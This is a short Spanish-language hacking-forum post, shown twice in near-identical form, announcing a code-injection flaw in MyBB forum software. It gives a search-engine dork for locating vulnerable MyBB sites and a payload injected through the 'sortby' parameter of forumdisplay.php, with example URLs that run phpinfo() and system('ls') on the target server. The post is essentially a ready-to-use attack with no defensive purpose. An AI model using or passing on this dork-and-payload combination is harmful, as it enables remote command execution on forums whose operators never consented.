He descubierto un bug que afecta los foros hechos en MyBB recientes.
mi dork: inurl:"forumdisplay.php?fid=" +intext:"MyBB Group"
Exploit:
Sintaxis:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby=[exploit]
Ejemplos:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];phpinfo();exit;//
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];system('ls');exit;//
by zion![;D ;D](https://forum.elhacker.net/Smileys/navidad/grin.gif)
Mi fuente.
mi dork: inurl:"forumdisplay.php?fid=" +intext:"MyBB Group"
Exploit:
Código [Seleccionar]
'];<comando PHP>;exit;//
Sintaxis:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby=[exploit]
Ejemplos:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];phpinfo();exit;//
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];system('ls');exit;//
by zion
![;D ;D](https://forum.elhacker.net/Smileys/navidad/grin.gif)
Mi fuente.